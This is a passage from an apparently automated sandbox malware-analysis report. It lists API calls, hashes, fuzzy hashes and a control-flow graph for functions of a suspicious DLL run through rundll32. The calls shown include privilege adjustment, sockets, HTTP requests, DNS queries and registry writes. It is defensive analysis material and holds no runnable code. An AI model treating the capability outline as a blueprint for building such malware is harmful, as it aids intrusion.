                              • Associated: 0000001E.00000002.3965841046.000000006CD78000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000001E.00000002.3965860803.000000006CD7D000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000001E.00000002.3965890619.000000006CDD7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000001E.00000002.3965911426.000000006CDEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_30_2_6cd50000_rundll32.jbxd
                              Similarity
                              • API ID: CountTick$Sleep
                              • String ID: F$d
                              • API String ID: 4250438611-811691143
                              • Opcode ID: a098e7f8e63afde0cfcad1b01a541da313c866a3f0ed59b293527f0a8b3f9828
                              • Instruction ID: 5741d3671f550c46167cfbcedb5e4d7b338e2c59d17bfafe5065f546fc8f0359
                              • Opcode Fuzzy Hash: a098e7f8e63afde0cfcad1b01a541da313c866a3f0ed59b293527f0a8b3f9828
                              • Instruction Fuzzy Hash: 54015A30E04298EFDF04EFACCA0529DBB71FF02315F5082AAD921A2654DB75CA61EB51
                              Function 6CD66580 Relevance: 1.5, APIs: 1, Instructions: 36COMMON
                              Download Yara Rule

                              Control-flow Graph

                              APIs
                              • AdjustTokenPrivileges.KERNELBASE(00000028,?,?,?,?,?,00000028,00000000), ref: 6CD665E2
                              Memory Dump Source
                              • Source File: 0000001E.00000002.3965809546.000000006CD51000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CD50000, based on PE: true
                              • Associated: 0000001E.00000002.3965781157.000000006CD50000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000001E.00000002.3965841046.000000006CD78000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000001E.00000002.3965860803.000000006CD7D000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000001E.00000002.3965890619.000000006CDD7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000001E.00000002.3965911426.000000006CDEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_30_2_6cd50000_rundll32.jbxd
                              Similarity
                              • API ID: AdjustPrivilegesToken
                              • String ID:
                              • API String ID: 2874748243-0
                              • Opcode ID: fedf07aa14fbab5e5a77c0bbc80ca200d2b8c814a5129c1e9c60e8885f5a4d10
                              • Instruction ID: 4eac245e379327e1e83174ec7c3874499f21827dd16576a9ee06b3752f063660
                              • Opcode Fuzzy Hash: fedf07aa14fbab5e5a77c0bbc80ca200d2b8c814a5129c1e9c60e8885f5a4d10
                              • Instruction Fuzzy Hash: C9F068B5600209BBDF04EF64DC81EDF37B8AB45705F404119B90593750DB30A569C7F5
                              Function 6CD72DE0 Relevance: 1.5, APIs: 1, Instructions: 32networkCOMMON
                              Download Yara Rule
                              APIs
                              • recv.WS2_32(00001000,?,?,?,00001000,00000004,6CDDA060), ref: 6CD72E3A
                              Memory Dump Source
                              • Source File: 0000001E.00000002.3965809546.000000006CD51000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CD50000, based on PE: true
                              • Associated: 0000001E.00000002.3965781157.000000006CD50000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000001E.00000002.3965841046.000000006CD78000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000001E.00000002.3965860803.000000006CD7D000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000001E.00000002.3965890619.000000006CDD7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000001E.00000002.3965911426.000000006CDEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_30_2_6cd50000_rundll32.jbxd
                              Similarity
                              • API ID: recv
                              • String ID:
                              • API String ID: 1507349165-0
                              • Opcode ID: 9fd7155af1e7722e26ba3d95c0bdafb807698a076085ba7c63eb77a770bae0bf
                              • Instruction ID: 361a71825b4224b9111fa012168117e9633dcfcd24ef7344b1946d8a302c08fc
                              • Opcode Fuzzy Hash: 9fd7155af1e7722e26ba3d95c0bdafb807698a076085ba7c63eb77a770bae0bf
                              • Instruction Fuzzy Hash: 2BF05475A4060CBBDF00DFA4DC85E9B37BCAB46605F404658F90657A60EB30A9688BB5
                              Function 6CD72B70 Relevance: 1.5, APIs: 1, Instructions: 30networkCOMMON
                              Download Yara Rule
                              APIs
                              • bind.WS2_32(00000003,?,?,00000003,00000000), ref: 6CD72BC6
                              Memory Dump Source
                              • Source File: 0000001E.00000002.3965809546.000000006CD51000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CD50000, based on PE: true
                              • Associated: 0000001E.00000002.3965781157.000000006CD50000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000001E.00000002.3965841046.000000006CD78000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000001E.00000002.3965860803.000000006CD7D000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000001E.00000002.3965890619.000000006CDD7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000001E.00000002.3965911426.000000006CDEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_30_2_6cd50000_rundll32.jbxd
                              Similarity
                              • API ID: bind
                              • String ID:
                              • API String ID: 1187836755-0
                              • Opcode ID: e9aa97cc8f4d94d5d2c29697871ee939479c27c2a0e00f375e31cf3617e841ec
                              • Instruction ID: d2a65e8af8d810e2f310fcceaf937a03f4f1e62f3dddd44310b31814cae01de2
                              • Opcode Fuzzy Hash: e9aa97cc8f4d94d5d2c29697871ee939479c27c2a0e00f375e31cf3617e841ec
                              • Instruction Fuzzy Hash: 47F08275E04204BBDF10EF64DC44FAE77BDAB45219F404719FD05926A0EB3065A887A1
                              Function 6CD52C90 Relevance: 4.8, APIs: 3, Instructions: 345COMMONLIBRARYCODE
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 17 6cd52c90-6cd52ca1 18 6cd52ca3-6cd52cb8 17->18 19 6cd52cbe-6cd52cc4 17->19 18->19 20 6cd52cc6 19->20 21 6cd52ccb-6cd52cd2 19->21 22 6cd531c6-6cd531ce 20->22 23 6cd52cd4-6cd52d08 call 6cd54a80 call 6cd51fe0 call 6cd54bf0 21->23 24 6cd52d0d-6cd52d14 21->24 23->22 25 6cd52d16-6cd52d4a call 6cd54a80 call 6cd51fe0 call 6cd54bf0 24->25 26 6cd52d4f-6cd52d56 24->26 25->22 30 6cd52d91-6cd52d98 26->30 31 6cd52d58-6cd52d8c call 6cd54a80 call 6cd51fe0 call 6cd54bf0 26->31 33 6cd52dd3-6cd52dda 30->33 34 6cd52d9a-6cd52dce call 6cd54a80 call 6cd51fe0 call 6cd54bf0 30->34 31->22 37 6cd52e15-6cd52e1c 33->37 38 6cd52ddc-6cd52e10 call 6cd54a80 call 6cd51fe0 call 6cd54bf0 33->38 34->22 46 6cd52e57-6cd52e5e 37->46 47 6cd52e1e-6cd52e4d call 6cd54a80 call 6cd51fe0 LoadLibraryA call 6cd54bf0 37->47 38->22 51 6cd52e60-6cd52e94 call 6cd54a80 call 6cd51fe0 call 6cd54bf0 46->51 52 6cd52e99-6cd52ea0 46->52 93 6cd52e52 47->93 51->22 60 6cd52ea2-6cd52ed6 call 6cd54a80 call 6cd51fe0 call 6cd54bf0 52->60 61 6cd52edb-6cd52ee2 52->61 60->22 68 6cd52ee4-6cd52f18 call 6cd54a80 call 6cd51fe0 call 6cd54bf0 61->68 69 6cd52f1d-6cd52f24 61->69 68->22 73 6cd52f26-6cd52f5a call 6cd54a80 call 6cd51fe0 call 6cd54bf0 69->73 74 6cd52f5f-6cd52f66 69->74 73->22 87 6cd52fa1-6cd52fa8 74->87 88 6cd52f68-6cd52f97 call 6cd54a80 call 6cd51fe0 LoadLibraryA call 6cd54bf0 74->88 95 6cd52fe3-6cd52fea 87->95 96 6cd52faa-6cd52fde call 6cd54a80 call 6cd51fe0 call 6cd54bf0 87->96 138 6cd52f9c 88->138 93->22 106 6cd53025-6cd5302c 95->106 107 6cd52fec-6cd53020 call 6cd54a80 call 6cd51fe0 call 6cd54bf0 95->107 96->22 112 6cd53067-6cd5306e 106->112 113 6cd5302e-6cd5305d call 6cd54a80 call 6cd51fe0 LoadLibraryA call 6cd54bf0 106->113 107->22 122 6cd53070-6cd530a4 call 6cd54a80 call 6cd51fe0 call 6cd54bf0 112->122 123 6cd530a9-6cd530b0 112->123 166 6cd53062 113->166 122->22 130 6cd530b2-6cd530e6 call 6cd54a80 call 6cd51fe0 call 6cd54bf0 123->130 131 6cd530eb-6cd530f2 123->131 130->22 139 6cd530f4-6cd5312e call 6cd54a80 call 6cd51fe0 call 6cd54bf0 131->139 140 6cd53133-6cd5313a 131->140 138->22 139->22 151 6cd5313c-6cd53176 call 6cd54a80 call 6cd51fe0 call 6cd54bf0 140->151 152 6cd53178-6cd5317f 140->152 151->22 156 6cd53181-6cd531bb call 6cd54a80 call 6cd51fe0 call 6cd54bf0 152->156 157 6cd531bd-6cd531c0 152->157 156->22 157->22 166->22
                              Memory Dump Source
                              • Source File: 0000001E.00000002.3965809546.000000006CD51000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CD50000, based on PE: true
                              • Associated: 0000001E.00000002.3965781157.000000006CD50000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000001E.00000002.3965841046.000000006CD78000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000001E.00000002.3965860803.000000006CD7D000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000001E.00000002.3965890619.000000006CDD7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000001E.00000002.3965911426.000000006CDEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_30_2_6cd50000_rundll32.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 5e1892ad7e4fc7dda663b5a1bbdcfd5af4397b97d278706df5c6e3228e46f3c4
                              • Instruction ID: 8adcfee697f6201d50e44eb6757f91f10167bde8f8e61a10de3c97f86793617b
                              • Opcode Fuzzy Hash: 5e1892ad7e4fc7dda663b5a1bbdcfd5af4397b97d278706df5c6e3228e46f3c4
                              • Instruction Fuzzy Hash: D3D17D74A09208EBDF549F70CC59EDD3BB4BF05348F80451AE40A6BBB0DB34956DCAA5
                              Function 6CD751A0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40networkCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              APIs
                              • HttpOpenRequestA.WININET(84400100,?,?,?,?,?,?,?,84400100,00000000), ref: 6CD7520A
                              Strings
                              Memory Dump Source
                              • Source File: 0000001E.00000002.3965809546.000000006CD51000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CD50000, based on PE: true
                              • Associated: 0000001E.00000002.3965781157.000000006CD50000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000001E.00000002.3965841046.000000006CD78000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000001E.00000002.3965860803.000000006CD7D000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000001E.00000002.3965890619.000000006CDD7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000001E.00000002.3965911426.000000006CDEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_30_2_6cd50000_rundll32.jbxd
                              Similarity
                              • API ID: HttpOpenRequest
                              • String ID: @<t
                              • API String ID: 1984915467-2873137160
                              • Opcode ID: 424d0214629a035d7647091a390d7d5ec3ed93fb3636c6658290d5c813b5ebd4
                              • Instruction ID: ca02d6d7127a81aa2c04ebc5476531a065f3f949b162a9b992578c9b28c2a703
                              • Opcode Fuzzy Hash: 424d0214629a035d7647091a390d7d5ec3ed93fb3636c6658290d5c813b5ebd4
                              • Instruction Fuzzy Hash: 52011D71610108BBDF44DF94DC90EDE37B8AB4C245F404618FA0993661DB30E9688BB1
                              Function 6CD63D10 Relevance: 1.5, APIs: 1, Instructions: 48COMMON
                              Download Yara Rule

                              Control-flow Graph

                              APIs
                              • CreateWindowExW.USER32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6CD63D8A
                              Memory Dump Source
                              • Source File: 0000001E.00000002.3965809546.000000006CD51000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CD50000, based on PE: true
                              • Associated: 0000001E.00000002.3965781157.000000006CD50000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000001E.00000002.3965841046.000000006CD78000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000001E.00000002.3965860803.000000006CD7D000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000001E.00000002.3965890619.000000006CDD7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000001E.00000002.3965911426.000000006CDEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_30_2_6cd50000_rundll32.jbxd
                              Similarity
                              • API ID: CreateWindow
                              • String ID:
                              • API String ID: 716092398-0
                              • Opcode ID: 8758094739b1d243a1e6ffb5428a0c2240210853efe9421867af52fdb646f657
                              • Instruction ID: a6e42aaa3ad6eb6b3af3e6a345305df2a0765774631167e01b54b63b4ed4b9b0
                              • Opcode Fuzzy Hash: 8758094739b1d243a1e6ffb5428a0c2240210853efe9421867af52fdb646f657
                              • Instruction Fuzzy Hash: A0011E76604108ABDB44DF98DC90EDA37BCAB9C344F444608FA0997650D730E865CBA0
                              Function 6CD76E00 Relevance: 1.5, APIs: 1, Instructions: 42networkCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              APIs
                              • WSAIoctl.WS2_32(6CD6BECA,?,?,?,?,?,?,?,?,6CD6BECA,?), ref: 6CD76E6E
                              Memory Dump Source
                              • Source File: 0000001E.00000002.3965809546.000000006CD51000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CD50000, based on PE: true
                              • Associated: 0000001E.00000002.3965781157.000000006CD50000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000001E.00000002.3965841046.000000006CD78000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000001E.00000002.3965860803.000000006CD7D000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000001E.00000002.3965890619.000000006CDD7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000001E.00000002.3965911426.000000006CDEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_30_2_6cd50000_rundll32.jbxd
                              Similarity
                              • API ID: Ioctl
                              • String ID:
                              • API String ID: 3041054344-0
                              • Opcode ID: 5c5d63d91a6ec1144f6fe3cd630928e5713814d3a19cfa311989323e8be02769
                              • Instruction ID: 8574da47fb506351b4b7aee2c11e2fd36cdaaba072f5b60661fb8c0ed85a4333
                              • Opcode Fuzzy Hash: 5c5d63d91a6ec1144f6fe3cd630928e5713814d3a19cfa311989323e8be02769
                              • Instruction Fuzzy Hash: 0D01FF76604108ABDB44DFA8EC55EEF37BCAB4C304F404618FA09D3654E730E82587B1
                              Function 6CD5D870 Relevance: 1.5, APIs: 1, Instructions: 42registryCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              APIs
                              • RegCreateKeyExW.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000,00000000,6CDB84A4,00000001), ref: 6CD5D8DE
                              Memory Dump Source
                              • Source File: 0000001E.00000002.3965809546.000000006CD51000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CD50000, based on PE: true
                              • Associated: 0000001E.00000002.3965781157.000000006CD50000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000001E.00000002.3965841046.000000006CD78000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000001E.00000002.3965860803.000000006CD7D000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000001E.00000002.3965890619.000000006CDD7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000001E.00000002.3965911426.000000006CDEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_30_2_6cd50000_rundll32.jbxd
                              Similarity
                              • API ID: Create
                              • String ID:
                              • API String ID: 2289755597-0
                              • Opcode ID: acfdec4c8498841cc8befef09584d0fc18bd5668d8c17df83e3ee386338fe814
                              • Instruction ID: 496ca4c92e5df9aa427a6f00ad463cad4830b33d5325db5ecf39f457e2bab333
                              • Opcode Fuzzy Hash: acfdec4c8498841cc8befef09584d0fc18bd5668d8c17df83e3ee386338fe814
                              • Instruction Fuzzy Hash: 22014F76604109ABDB04DFA4DC40EEB77F9AB5C305F408218BA0993650DB31E869CBB1
                              Function 6CD750B0 Relevance: 1.5, APIs: 1, Instructions: 40networkCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              APIs
                              • InternetConnectA.WININET(00000000,?,?,?,?,?,?,?,00000000,00000000), ref: 6CD7511B
                              Memory Dump Source
                              • Source File: 0000001E.00000002.3965809546.000000006CD51000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CD50000, based on PE: true
                              • Associated: 0000001E.00000002.3965781157.000000006CD50000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000001E.00000002.3965841046.000000006CD78000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000001E.00000002.3965860803.000000006CD7D000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000001E.00000002.3965890619.000000006CDD7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000001E.00000002.3965911426.000000006CDEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_30_2_6cd50000_rundll32.jbxd
                              Similarity
                              • API ID: ConnectInternet
                              • String ID:
                              • API String ID: 3050416762-0
                              • Opcode ID: 7aafd13f0ecc5bd0459b103740a10e6e1ab8b87677cfef5f0ee6351af256416c
                              • Instruction ID: e8b1bc96e91760d0b1747511f85559117fb821f3a9cff0a85b622be511c32db2
                              • Opcode Fuzzy Hash: 7aafd13f0ecc5bd0459b103740a10e6e1ab8b87677cfef5f0ee6351af256416c
                              • Instruction Fuzzy Hash: FC013671604108BBDF54DF94DC40EEA37FCAF8C214F404118BA0993661DB30D9A5C7B1
                              Function 6CD71990 Relevance: 1.5, APIs: 1, Instructions: 40registryCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              APIs
                              • RegEnumValueA.KERNEL32(00000000,?,?,?,?,?,?,?,00000000,00000000), ref: 6CD719FA
                              Memory Dump Source
                              • Source File: 0000001E.00000002.3965809546.000000006CD51000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CD50000, based on PE: true
                              • Associated: 0000001E.00000002.3965781157.000000006CD50000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000001E.00000002.3965841046.000000006CD78000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000001E.00000002.3965860803.000000006CD7D000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000001E.00000002.3965890619.000000006CDD7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000001E.00000002.3965911426.000000006CDEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_30_2_6cd50000_rundll32.jbxd
                              Similarity
                              • API ID: EnumValue
                              • String ID:
                              • API String ID: 2814608202-0
                              • Opcode ID: 32f016aa9835caad0ed8e313f40a69c7de39141be8595ce0e359f600961f7ba0
                              • Instruction ID: 538bf54d47a3bd399f4bf3b03e09ff1efe3eb231f81bf7c10c593280ba4eb536
                              • Opcode Fuzzy Hash: 32f016aa9835caad0ed8e313f40a69c7de39141be8595ce0e359f600961f7ba0
                              • Instruction Fuzzy Hash: A0011D75A04108AFDF14DFA5DC50EAF37B9AB48204F404619F90993660DB31E8658BB6
                              Function 6CD76FE0 Relevance: 1.5, APIs: 1, Instructions: 38networkCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              APIs
                              • WSARecv.WS2_32(?,?,?,?,?,?,?), ref: 6CD77046
                              Memory Dump Source
                              • Source File: 0000001E.00000002.3965809546.000000006CD51000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CD50000, based on PE: true
                              • Associated: 0000001E.00000002.3965781157.000000006CD50000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000001E.00000002.3965841046.000000006CD78000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000001E.00000002.3965860803.000000006CD7D000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000001E.00000002.3965890619.000000006CDD7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000001E.00000002.3965911426.000000006CDEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_30_2_6cd50000_rundll32.jbxd
                              Similarity
                              • API ID: Recv
                              • String ID:
                              • API String ID: 4192927123-0
                              • Opcode ID: 47a89e131fb807f74a25aa1910f1fe587597ee51f75f0fb14b49d1b9a4eae39f
                              • Instruction ID: dbbc2fba1a899d3effd75d18611680b7f54d91aaa209390cb039885e56277640
                              • Opcode Fuzzy Hash: 47a89e131fb807f74a25aa1910f1fe587597ee51f75f0fb14b49d1b9a4eae39f
                              • Instruction Fuzzy Hash: 32F01D7260410CAFDF50DF94DC55E9F37BCAB58209F804618FA0593660EB30992987A1
                              Function 6CD76F60 Relevance: 1.5, APIs: 1, Instructions: 38networkCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              APIs
                              • WSASend.WS2_32(?,?,?,?,?,?,?,?,00000000), ref: 6CD76FC6
                              Memory Dump Source
                              • Source File: 0000001E.00000002.3965809546.000000006CD51000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CD50000, based on PE: true
                              • Associated: 0000001E.00000002.3965781157.000000006CD50000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000001E.00000002.3965841046.000000006CD78000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000001E.00000002.3965860803.000000006CD7D000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000001E.00000002.3965890619.000000006CDD7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000001E.00000002.3965911426.000000006CDEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_30_2_6cd50000_rundll32.jbxd
                              Similarity
                              • API ID: Send
                              • String ID:
                              • API String ID: 121738739-0
                              • Opcode ID: bb3c1827df35d59f2896ab6857aabaaa57f6e8fa95a4954fb345f56ab8ff8799
                              • Instruction ID: f3dda8538591f89589e3bd505f98714151a908c3fa7467dba12fa1bd20693993
                              • Opcode Fuzzy Hash: bb3c1827df35d59f2896ab6857aabaaa57f6e8fa95a4954fb345f56ab8ff8799
                              • Instruction Fuzzy Hash: 0CF04471604108BBDF40DF94DC55E9E77BCAB59305F408619BA09D3654EB30A8298BB1
                              Function 6CD71CA0 Relevance: 1.5, APIs: 1, Instructions: 36networkCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              APIs
                              • DnsQuery_A.DNSAPI(6CDD6EF4,?,?,?,?,?,6CDD6EF4,00000000,6CD70D49,6CDD6EF4,00000004), ref: 6CD71D03
                              Memory Dump Source
                              • Source File: 0000001E.00000002.3965809546.000000006CD51000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CD50000, based on PE: true
                              • Associated: 0000001E.00000002.3965781157.000000006CD50000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000001E.00000002.3965841046.000000006CD78000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000001E.00000002.3965860803.000000006CD7D000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000001E.00000002.3965890619.000000006CDD7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000001E.00000002.3965911426.000000006CDEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_30_2_6cd50000_rundll32.jbxd
                              Similarity
                              • API ID: Query_
                              • String ID:
                              • API String ID: 428220571-0
                              • Opcode ID: b49771f30c5ab727173e1122b90ad82651215b1994b39f7099055bebafe149a4
                              • Instruction ID: 060fcf6945d1ef780af0f8b58fcef8c97e33c0d59adf0ef7b2dd32bc1b9393a4
                              • Opcode Fuzzy Hash: b49771f30c5ab727173e1122b90ad82651215b1994b39f7099055bebafe149a4
                              • Instruction Fuzzy Hash: 6AF06275A04108BBDB40DFA4DCA1EEF37BCAB44204F408619FD0592690DB31A569C7B2
                              Function 6CD5F810 Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              APIs
                              • CreateThread.KERNEL32(00000000,?,?,?,?,?,00000000,6CD512EE,?,6CD512EE,?,6CD7D944,00000001,6CD7D96C,00000001), ref: 6CD5F872
                              Memory Dump Source
                              • Source File: 0000001E.00000002.3965809546.000000006CD51000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CD50000, based on PE: true
                              • Associated: 0000001E.00000002.3965781157.000000006CD50000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000001E.00000002.3965841046.000000006CD78000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000001E.00000002.3965860803.000000006CD7D000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000001E.00000002.3965890619.000000006CDD7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000001E.00000002.3965911426.000000006CDEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_30_2_6cd50000_rundll32.jbxd
                              Similarity
                              • API ID: CreateThread
                              • String ID:
                              • API String ID: 2422867632-0
                              • Opcode ID: 4d3a64b8217893de9cd0f61d7c94298aafc672fc4a5b6e50d39c323aacc1e9a8
                              • Instruction ID: 979335e7a4f8dfdae56f86856e92dfd92579cb9b216b68e3b2a490875e5f4799
                              • Opcode Fuzzy Hash: 4d3a64b8217893de9cd0f61d7c94298aafc672fc4a5b6e50d39c323aacc1e9a8
                              • Instruction Fuzzy Hash: A0F06276604108BBDF44DFE4EC40EAE77F8AB48244F404618BA06D7650EB30A9298BB6
                              Function 6CD66730 Relevance: 1.5, APIs: 1, Instructions: 34COMMON
                              Download Yara Rule

                              Control-flow Graph

                              APIs
                              • GetTokenInformation.KERNELBASE(00020008,?,?,?,?,00020008,00000000), ref: 6CD6678E
                              Memory Dump Source
                              • Source File: 0000001E.00000002.3965809546.000000006CD51000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CD50000, based on PE: true
                              • Associated: 0000001E.00000002.3965781157.000000006CD50000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000001E.00000002.3965841046.000000006CD78000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000001E.00000002.3965860803.000000006CD7D000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000001E.00000002.3965890619.000000006CDD7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000001E.00000002.3965911426.000000006CDEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_30_2_6cd50000_rundll32.jbxd
                              Similarity
                              • API ID: InformationToken
                              • String ID:
                              • API String ID: 4114910276-0
                              • Opcode ID: 09f3feb31454465134d6eba986473de9ba659495414c8f6808809418e13ebd85
                              • Instruction ID: 800fc8f85ec53e6ae812986bba2fa9ec41e210d03fa8e0dab2e0eac03ea6014e
                              • Opcode Fuzzy Hash: 09f3feb31454465134d6eba986473de9ba659495414c8f6808809418e13ebd85
                              • Instruction Fuzzy Hash: 20F01DB6A00209ABDF14DFA4DC81EAE77B8AB08215F404519FA0697A60DB30996987B5
                              Function 6CD71AF0 Relevance: 1.5, APIs: 1, Instructions: 34networkCOMMON
                              Download Yara Rule
                              APIs
                              • InternetOpenA.WININET(00000000,?,?,?,?,00000000,00001000), ref: 6CD71B4E
                              Memory Dump Source
                              • Source File: 0000001E.00000002.3965809546.000000006CD51000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CD50000, based on PE: true
                              • Associated: 0000001E.00000002.3965781157.000000006CD50000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000001E.00000002.3965841046.000000006CD78000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000001E.00000002.3965860803.000000006CD7D000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000001E.00000002.3965890619.000000006CDD7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000001E.00000002.3965911426.000000006CDEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_30_2_6cd50000_rundll32.jbxd
                              Similarity
                              • API ID: InternetOpen
                              • String ID:
                              • API String ID: 2038078732-0
                              • Opcode ID: dad356ac42783e76d3cf91e48cabaf882a4a52e62c98378efd60bf509c916298
